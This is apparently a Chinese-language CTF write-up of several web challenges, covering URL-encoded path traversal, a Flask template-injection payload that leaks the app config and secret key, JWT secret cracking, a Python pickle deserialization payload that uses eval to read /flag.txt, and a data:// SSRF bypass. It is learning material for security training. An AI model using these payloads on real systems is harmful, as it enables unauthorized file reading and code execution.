攻防世界-web题型-9星难度汇总-个人wp

news2024/11/15 15:28:04

TimeKeeper

2024/03/10 16:18

有两周没有打靶场了,这段时间在准备护网的面试,顺便挖了下edu也是挖到了一些漏洞。

言归正传,看看这道题目。进去是一个shop,先注册一个账号尝试注册admin发现操作失败,尝试登录admin admin发现登录进去了,点进个人中心有1000.1元

在页面摸了半天就发现一个逻辑漏洞,点击加入购物车后结算把价格修改为负数就会加钱。而且可以直接放包刷,看了一下框架有flask

扫目录发现一个console控制台

怎么感觉我好像遇到过这个东西

抓个登录的包看了看,发包出去后回显的很慢

看到Server: Werkzeug/0.14.1 Python/2.7.12

这个Werkzeug不是很了解

尝试一下爆破

在网上找了一下Werkzeug相关的文章,有一个说到如果开启了debug模式就可以拿shell,如果有pin需要找到文件读取的漏洞找到一些什么东西,所以是应该找一下任意文件读取吗?

找了一圈没有看到其他的漏洞除了那处购买商品的地方

看wp

。。。第一种思路果然是我前面看到的那种,没想到还有骚操作,/asserts/../../../../flag (url编码一下)可以目录穿越直接把flag下载下来,我试过了确实可以

里面是这个东西

ciscn{this_is_a_sample_flag}

答案在flag.txt里面

重点还是学知识

看这一篇文章:https://xz.aliyun.com/t/2553

任意文件读取就是和这个目录穿越漏洞

可以通过这种方式将所有的源代码读取下来,废了,看的头晕

根据debug的页面显示的路径读取

报错的方法就是付款哪里那个id和price添加单引号就会报错

路径;在读取文件的时候又爆出几个路径

/app/TKShop/shop.py

/usr/local/lib/python2.7/dist-packages/flask/app.py

/usr/local/lib/python2.7/dist-packages/flask/helpers.py

/app/TKShop/users.py

访问路径:http://61.147.171.105:54591/asserts/..%2F..%2F..%2F..%2Fusr/local/lib/python2.7/dist-packages/werkzeug/debug/init.py

得到init的源码

也是找到了getpin的函数

定位到这里,产生机器ID确实就是这里两个文件

废了

看了官方的wp也是这样说的

还有一种方式

没看懂???

尝试注册一个

{user.__class__.__mro__[3].__init__.__globals__[current_app].config}

确实得到了一些数据,在个人页面的源码可以看到

<h1 class="user-username">
<Config {'JSON_AS_ASCII': True, 'USE_X_SENDFILE': False, 'SQLALCHEMY_DATABASE_URI': 'sqlite:app/TKShop/tkshop.db', 'SESSION_COOKIE_SECURE': False, 'SQLALCHEMY_TRACK_MODIFICATIONS': True, 'SQLALCHEMY_POOL_SIZE': None, 'SQLALCHEMY_POOL_TIMEOUT': None, 'SESSION_COOKIE_PATH': None, 'SQLALCHEMY_RECORD_QUERIES': None, 'SESSION_COOKIE_DOMAIN': False, 'SESSION_COOKIE_NAME': 'session', 'SQLALCHEMY_BINDS': None, 'SQLALCHEMY_POOL_RECYCLE': None, 'MAX_COOKIE_SIZE': 4093, 'SESSION_COOKIE_SAMESITE': None, 'PROPAGATE_EXCEPTIONS': None, 'ENV': 'production', 'DEBUG': True, 'SQLALCHEMY_COMMIT_ON_TEARDOWN': False, 'SECRET_KEY': 'p0rS6BhxebzvC2XDYRNqiOH48AU3ITmE', 'EXPLAIN_TEMPLATE_LOADING': False, 'UPLOAD_FOLDER': '/app/TKShop/asserts/uploads/', 'SQLALCHEMY_NATIVE_UNICODE': None, 'MAX_CONTENT_LENGTH': None, 'SQLALCHEMY_ECHO': False, 'APPLICATION_ROOT': '/', 'SERVER_NAME': None, 'PREFERRED_URL_SCHEME': 'http', 'JSONIFY_PRETTYPRINT_REGULAR': False, 'TESTING': False, 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31), 'TEMPLATES_AUTO_RELOAD': None, 'TRAP_BAD_REQUEST_ERRORS': None, 'JSON_SORT_KEYS': True, 'JSONIFY_MIMETYPE': 'application/json', 'SQLALCHEMY_MAX_OVERFLOW': None, 'SESSION_COOKIE_HTTPONLY': True, 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(0, 43200), 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'TRAP_HTTP_EXCEPTIONS': False}>
</h1>
<h3 class="user-email">
邮箱地址:123@qq.com
</h3>
<h3 class="user-integral">
剩余积分:1000.1
</h3>

有个SECRET_KEY': 'p0rS6BhxebzvC2XDYRNqiOH48AU3ITmE',

用官方的脚本按理来说是替换session进入但是好像不是这样的。。。

确实有个session然后替换后并没有用,抓包看了session很长一段不是这样的好像。我感觉这里好像没有什么admin毕竟我就是admin账号登录进去的。。。后来我又想是不是Python的版本和flask的版本,然后我不会写session解密的脚本,本来是想看看没加密前的session是什么样的是不是{"admin":true,"id":100,"username":"admin"}'  这个样子的。。。

Web_python_flask_sql_injection

2024/02/27 17:45

题目名字是flask框架加SQL注入,同时还提供了源码

先摸索一下页面的功能点

注册admin发现提示使用其他的用户名,用123456@qq.com也是

然后我怎么使用其他的用户名也注册不了???

看了看源码没有对注册做什么事情,看一下wp怎么说的,wp好像都可以正常注册,重启后任然是无法创建新用户,估计是和数据库断开了之前也遇到过

 

bilibili

2024/02/26 18:23

题目提示了逻辑漏洞

打开网站wc小黑子666你干嘛哎呦哈哈哈

看到源码

你干嘛哎呦!!!

看到服务器是tornado

尝试注册一个admin发现跳转到什么都没有的页面,侧面印证了应该是存在admin账号的

注册一个进去后发现有1000元,然后这些商品名字好像都是base编码过或者加密的样子

难道这个是提示

买到lv6?

看了一下修改密码的功能抓包发现使用了jwt,这里可能存在jwt伪造

找回密码的功能点好像被删除了没有用点击了就是302跳转

又仔细看了下这个商品,单纯的又info/数字 控制 商品相当多,要找到lv6的对应的商品感觉需要爆破一下,设置一下这个检索匹配lv6从响应包中

果然有信息,但是这个价格我这个账号买不起,抓包尝试修改价格还是没有成功。。。

在研究jwt的时候发现将这道题作为例子讲???果然是jwt的问题

这里的用法是撞密钥出来

这里用到这个工具https://github.com/brendan-rius/c-jwt-cracker.git

我的笔记有记录安装的方法【有道云笔记】jwt(json web token) 有道云笔记

可以看到解出来时1Kun

然后再那个网站里面修改用户并且添加上这个密钥得到新的jwt再去尝试

但是怎么操作失败???我看wp里面就是这样的,用了base64加密的进去后是500???

我发现问题了,我通过info/1624进入的是其他的页面,wp里面都是直接进入的shop页面,我重新爆破一下再180页面

这里购买就有区别了,有优惠券

我看wp说修改了折扣就会跳转到其他的页面,我修改了怎么没有反应???反正wp说会跳转到一个b1g_m4mber的页面

再抓这个包修改jwt进来了。

然后这个页面有个www.zip的文件。

有一说一我这个夸克网盘插件资源嗅探还挺不错的,自动就帮我找到了

废了,python的代码审计都不知道要找什么东西。。。

说是pickle反序列化的问题

可以看看这个深入剖析pickle 反序列化漏洞浅析_pickle.loads-CSDN博客

感觉很复杂,实际要想搞懂也很复杂。。。,解释的时候再栈里面干了什么,然后不同的版本还有不同的用法

payload

import pickle
import urllib


class payload(object):
   def __reduce__(self):  #这个__reduce__类似于php中的wakeup这种序列化开始或者结束就会自动调用的魔术方法
      return (eval, ("open('/flag.txt','r').read()",))    #用eval函数执行Python代码读取数据


exp = pickle.dumps(payload())  #序列化
exp = urllib.quote(exp)   #URl编码
print exp

Python2的环境运行一下

然后抓个一键成为大会员的包,记得修改好jwt然后become替换为上面这个payload就可以了

flag{dfe54e6fe1e34f1e8fb03c8b50e963bd}

后面对Python相关的序列化也做了一些笔记记录

url

2024/02/26 17:10

打开网站一个错误no url,看到URl就想到ssrf,然后加上一个URl参数啥都没有。。。扫描了一下目录发现存在一个flag.php

然后思考一下换成post方式有反应了

尝试访问127.0.0.1发现被进制访问的地址

尝试一些php的伪协议

file也不可以

php://filter不可以

data也不可以

好像都不可以??什么意思host not allowed是不是需要白名单绕过,一看时尝试访问baidu虽然没有回显内容但是没有这个错误,我用自己的vps试一试

访问了自己的vps发现也是禁止的情况,是不是说明baidu是白名单?

那怎么绕过呢?

看看wp

data协议原来可以修改中间的东西

url=data://text/plain;base64,

中间这个text/plain是mime类型,将text修改为www.baidu.com即可,具体的原因可能是会忽略错误的媒体类型使用默认的方式执行比如当做文本处理。

但是修改了后面这个php代码并没有执行好家伙后面这个是n3k0,说是fuzz出来的。。。将n3k0编码一下就得到了,怎么说呢我之前好像做过这种修改data协议的的部分达到绕过。但是这个fuzz是没有想到,前面还扫出一个flag.php也没有排上用场。。。

如果没有这个fuzz这个题目真的不能算是9星题

flag{CB69174D05A7B042E7986A8AAEDDEF05}

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2070650.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Unity+Addressable

前期准备 下载一个hfs本地服务器&#xff0c;打开即可 HFS ~ HTTP 文件服务器 (rejetto.com) 1.安装Addressable插件 创建组 2.使用图片创建预制体 放入Addressable Groups内 3.右键 新建组 创建预制体t拖拽放入新建组里 新组命名为Gameobject 简化名称 4.创建一个测试脚本 …

Python和MATLAB梯度下降导图

&#x1f3af;要点 寻找局部最小值普通最小二乘法和随机梯度下降的动量线性回归媒体广告销售光学字符识别和最小化均方误差男女医疗费用最快速下降方向函数优化等高线图可视化共轭梯度下降可视化损失函数、动量、涅斯特洛夫动量、权衰减量化不确定性拓扑结构算法分类中权重归一…

西安电子高速PCB学习(四)

注意了&#xff0c;信号发生器的不同通路不能并联使用&#xff0c;示波器的信号通路不能并联电源使用&#xff0c;不同信号发生器不能并联使用&#xff1a; 严禁多个电容共用过孔&#xff1a; 多个电容并联时&#xff0c;小容量的电容应更靠近芯片电源引脚&#xff0c;主要原因…

【图像增强】使用 Albumentations Python 库(01)

目录 一、说明 二、Albumentations库 2.1 如何安装 2.2 测试代码示例 2.3 在albumentations库中实现的所有像素级变换 2.4 空间级转换 2.5 混合级别转换 三、让我们看看上述实现中的转换。 3.1 在专辑中实现的天气相关转换 3.2 随机雨 3.3 在相册中处理非 8 位图像 3.4 在文档…

如何优雅的实现CRUD,包含微信小程序,API,HTML的表单(一)

前言 在开发实际项目中&#xff0c;其实CRUD的代码量并不小&#xff0c;最近要做一个小程序项目&#xff0c;由于涉及表单的东西比较多&#xff0c;就萌生了一个想法&#xff0c;小程序的写法不是和VUE类似&#xff0c;就是数据绑定&#xff0c;模块么&#xff01;那就来一个动…

【vue3|第26期】Vue3 中的 useRoute 与 router.currentRoute.value:选择正确的路由访问方式

日期&#xff1a;2024年8月22日 作者&#xff1a;Commas 签名&#xff1a;(ง •_•)ง 积跬步以致千里,积小流以成江海…… 注释&#xff1a;如果您觉在这里插入代码片得有所帮助&#xff0c;帮忙点个赞&#xff0c;也可以关注我&#xff0c;我们一起成长&#xff1b;如果有不…

推荐4款2024年专业的电脑远程控制软件。

为了能够打破空间的限制&#xff0c;远程控制工具被越来越多的人使用。它们可以帮助提高工作效率&#xff0c;方便远程技术支持等。今天&#xff0c;就让我们一起来了解一下网上比较火的4款远程控制电脑的软件。 &#xff11;、向日葵 直达链接&#xff1a;https://down.oray.…

如何使用python脚本爬取微信公众号文章?

1、什么是爬虫&#xff1f; 在座的各位可能经常听到一个词&#xff0c;叫“爬虫”&#xff0c;这是一种能够悄无声息地将网站数据下载至本地设备的程序。利用爬虫&#xff0c;您无需亲自访问特定网站&#xff0c;逐个点击并手动下载所需数据。相反&#xff0c;爬虫能够全自动地…

FL Studio24苹果mac电脑破解绿色版安装包下载

FL Studio 24最新版本&#xff0c;这可不仅仅是一个音乐制作软件的升级&#xff0c;它是音乐创作爱好者的福音&#xff0c;是专业制作人的心头好。那么&#xff0c;它究竟有哪些魔力&#xff0c;能让这么多人为之疯狂呢&#xff1f; 我们来看看它的界面。FL Studio 24的界面设…

XGBoost中正则化的9个超参数

正则化是一种强大的技术,通过防止过拟合来提高模型性能。本文将探索各种XGBoost中的正则化方法及其优势。 为什么正则化在XGBoost中很重要? XGBoost是一种以其在各种机器学习任务中的效率和性能而闻名的强大算法。像任何其他复杂模型一样,它可能会过拟合,特别是在处理噪声数据…

x-cmd mod | x scoop - Windows 开源包管理工具

目录 介绍主要特点例子子命令 介绍 scoop 是 windows 的第三方包管理工具&#xff0c;与 winget, choco, chocolatey 类似。 本模块在 scoop 的基础上做了增强&#xff0c;使其可与 shell 无缝集成&#xff0c;并提供更多的功能。 主要特点 自动下载&#xff1a; 通过调用 S…

汇编语言:cmp、je、jne、jb、jnb、ja、jna 指令

一. cmp 指令 1. cmp 指令功能 cmp (compare) 是比较指令&#xff0c;cmp 的功能相当于减法指令&#xff0c;只是不保存结果&#xff0c;但会根据结果对标志寄存器进行设置&#xff0c;其它相关指令就可以通过识别这些被影响的标志寄存器的位来得知比较结果。 2. cmp指…

python爬虫:selenium+browsermobproxy实现浏览器请求抓取(模块安装详解)

前言 本来很多场景用beautiful和requests就能解决的&#xff0c;但是最近发现了某些网站会使用<link>来链接网页信息&#xff0c;让我没办法通过requests获取页面的具体内容&#xff1b;并且接口也加入了某种token的生成方案&#xff0c;导致我无从下手。 因此&#xff0…

Scrapy 分布式爬虫框架 Scrapy-Redis

github官网代码示例&#xff1a;https://github.com/rmax/scrapy-redis/blob/master/example-project/example/spiders/myspider_redis.py 什么是 Scrapy-Redis Scrapy-Redis 是一个基于 Scrapy 的扩展&#xff0c;用于实现分布式爬虫。它利用 Redis 作为分布式队列来共享待爬…

.NET_web前端框架_layui_栅格布局

基础概念 layui:用于简化前端编写的框架。响应式布局&#xff08;Responsive Layout&#xff09;:一种网页设计方法&#xff0c;使网页能够根据不同设备的屏幕尺寸和分辨率自动调整其内容和布局。栅格布局&#xff08;Grid Layout&#xff09;:一种网页设计布局方法&#xff0c…

计算机毕业设计选题推荐-OA办公管理系统-Java/Python项目实战

✨作者主页&#xff1a;IT毕设梦工厂✨ 个人简介&#xff1a;曾从事计算机专业培训教学&#xff0c;擅长Java、Python、微信小程序、Golang、安卓Android等项目实战。接项目定制开发、代码讲解、答辩教学、文档编写、降重等。 ☑文末获取源码☑ 精彩专栏推荐⬇⬇⬇ Java项目 Py…

【IEEE出版,连续7年稳定发表】第八届电气、机械与计算机工程国际学术会议(ICEMCE 2024,10月25-27)

由西京学院主办&#xff0c;AEIC学术交流中心协办&#xff0c;中国科学技术大学、深圳大学、浙江工业大学等校联合支持的第八届电气、机械与计算机工程国际学术会议&#xff08;ICEMCE 2024&#xff09;将于2024年10月25日至27日在西安举办。 本次会议主要围绕“电气”、"…

电脑文件自动加解密如何实现?3个方法教会你!

电脑文件的自动加解密是一项非常实用的功能&#xff0c;可以帮助确保数据的安全性。 以下是三种实现电脑文件自动加解密的方法&#xff1a; 方法一&#xff1a;使用操作系统自带的加密功能 Windows BitLocker&#xff1a; 启用BitLocker&#xff1a;在Windows系统中&#xf…

SpringBoot 项目——抽奖系统

本项目主要实现的功能是&#xff1a;主要服务于管理员用户&#xff0c;其可圈选奖品&#xff0c;人员来创建抽奖活动&#xff0c;并进行在线抽奖&#xff0c;并可通过短信或邮件的方式通知中奖者&#xff0c;同时普通用户可查看已结束的抽奖活动的中奖结果&#xff1b; 一、项…

ViT篇外:NVIDIA Llama-3.1-Minitron 4B

相关阅读&#xff1a; ViT&#xff1a;3 Compact Architecture MobileLLM&#xff1a;“苗条”的模型比较好&#xff01; 大家也许会很好奇为什么在ViT章节插入了NVIDIA Llama-3.1-Minitron 4B&#xff0c;ViT因为应用场景的特殊性所以都寄希望于高效率的模型&#xff0c;因…